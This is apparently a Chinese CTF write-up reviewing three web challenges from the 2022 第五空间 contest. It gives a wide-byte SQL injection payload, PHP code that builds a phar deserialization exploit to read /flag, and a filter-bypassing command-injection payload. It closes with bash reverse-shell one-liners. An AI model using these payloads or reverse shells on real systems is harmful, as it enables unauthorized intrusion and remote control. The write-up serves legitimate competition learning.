2022第五空间-web部分wp复盘总结

打了一天，麻了，大佬tql，这次get到了不少东西，一是一个不太常见的宽字节注入，我是真的没想到，而且后面也是看了wp理解了好一会才弄明白。

0x01:

题目是一个登录框，但是基本上是过滤掉了所有的常见注入的关键词。实在是没思路，后面看了大佬wp，才发现是宽字节注入，同时还要利用虚拟表，同时还有mysql的hex编码。
payload：

admin%df%27%09ununionion%09selselectect%091,2,0x6531306164633339343962613539616262653536653035376632306638383365#&password=123456

其中 0x6531306164633339343962613539616262653536653035376632306638383365 为 password=123456d的hex(md5(password)) 利用双写+宽字节构造payload。
123456加密后的md5：e10adc3949ba59abbe56e057f20f883e
因为宽字节的问题所以利用mysql 的hex编码一下：

0x02:

一个phar读取flag的操作，遇到这题的时候，phar差不多已经忘光了，首先扫目录得到www.zip 拿到源码进行简单的审计：
开始以为是文件上传，后面一看发现是构造phar直接读。
得到class.php

<?php
class upload{
    public $filename;
    public $ext;
    public $size;
    public $Valid_ext;

    public function __construct(){
        $this->filename = $_FILES["file"]["name"];
        $this->ext = end(explode(".", $_FILES["file"]["name"]));
        $this->size = $_FILES["file"]["size"] / 1024;
        $this->Valid_ext = array("gif", "jpeg", "jpg", "png");
    }

    public function start(){
        return $this->check();
    }

    private function check(){
        if(file_exists($this->filename)){
            return "Image already exsists";
        }elseif(!in_array($this->ext, $this->Valid_ext)){
            return "Only Image Can Be Uploaded";
        }else{
            return $this->move();
        }
    }

    private function move(){
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$this->filename);
        return "Upload succsess!";
    }

    public function __wakeup(){
        echo file_get_contents($this->filename);
    }
}


class check_img{
    public $img_name;
    public function __construct(){
        $this->img_name = $_GET['img_name'];
    }

    public function img_check(){
        if(file_exists($this->img_name)){
            return "Image exsists";
        }else{
            return "Image not exsists";
        }
    }
}

构造payload：

<?php
class upload{
    public $filename = "/flag";
}
#new Phar()这里定义了生成的phar文件的名字(这里定义的时候后缀是一定要.phar)
#实际上生成后后缀名也可以改(比如awsl.awsl也行),标志该文件是phar文件的是下面的__HALT那里
$phar =new Phar("awsl.phar"); 
$phar->startBuffering();
#这里XXX的内容随便写,注意后面的XXX如果不用;来和__HALT分割记得留个空格隔开(个人觉得后面XXX还是写个PHP语句好,省点麻烦)
#__HXXXX(注释里直接用全称会被识别)这一节在这个setStub这里必须保证这个为结尾而且不可省,标志这个为phar文件
$phar->setStub("XXX<?php XXX __HALT_COMPILER(); ?>"); 
#把要序列化的变量申明好(这里只知道能放序列化的一个变量,不知道怎么放多个(或许单个文件只能放一个序列化的变量))
$a = new upload();
#将目标变量存入(这里自动把它序列化了)
$phar->setMetadata($a); 
#这里会按照文件名,文件内容的形式打包到phar文件中,当使用phar://awsl.phar://test.txt就会类似用include包含后面定义的代码(这里文件名不影响是否解析 
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

?>

phar反序列化知识点可以看一下这篇文章：利用phar扩展PHP反序列化漏洞

放到本地运行一下，这里记得需要在你PHP版本目录下的php.ini文件里面把
phar.readonly = off 这一行的注释给去掉，并且改成off

在本地运行php后，目录下会生成一个.phar的文件 因为phar是可以随便修改为jpg png gif的，所以这里直接随便改个后缀，然后上传 再读取的时候 get传参 phar://upload/文件名.jpg 即可得到flag

0x03:

一个有趣的RCE题
打开发现有个ping 操作。 结合经验猜测是rce，

爆破一下账号密码，得到账号：admin 密码：admin123

登录后发现一样的，也是ban掉了很多关键词，利用字典fuzz 一波 这里给大家推荐一个字典：Web Pentesting Fuzz 字典,一个就够了。
这里看到 %0a可以绕过。

这里利用tac%09index.php 查看源码

发现这里过滤了好多命令，看到可疑的目录kylin 但是他把kylin给ban了，构造通配符直接进行flag的读取。
payload:

?ip=%0Acd%09ky?in%0aca\t%09*
成功得到flag：

构造其他payload可以大家可以参考一下这篇：RCE漏洞之绕过

总结：

这次还是学到不少东西，最后成绩28，web队里师傅们ak了 但是最后那个sql注入我是现在还没看懂，所以就没总结了。收获蛮大的。扩展了不少的思路，get到了大佬平时的思路，rce的那题，读文件的时候，队里师傅写了个一句话木马上去，ban了那么多关键词，我是怎么也想不到怎么写上去的。按我平时的思路就是，利用常见的命令 例如echo命令写马，但ban掉了不少东西， 同时，/也被ban了，进目录是没法搞的。但是大佬的思路是啥，日志写马，日志写马倒也是想到过，可是我/给我ban掉了，当时就没想到怎么给进目录，那么自然也就没法写马了，完了请教大佬的时候，大佬给我的是这样的：

思路是这样的，但是这个绕过属实是骚操作了。

另外还get到一个思路，就是平常的rce 如果是没有过滤掉管道符这种，可以直接利用反弹shell，直接读flag
具体操作

这是linux的一些反弹shell的命令，windows的大家可以自行百度。
常用的比如：

/bin/bash -i > /dev/tcp/127.0.0.1/8080 0<& 2>&1

bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
等等，骚操作还有不少，还有一些空格的绕过之类的操作。可以百度一下，有不少文章可以借鉴参考。
思路真的很重要，有时候你只能卡在一个地方走不了， 而大佬可以各种骚操作绕过等。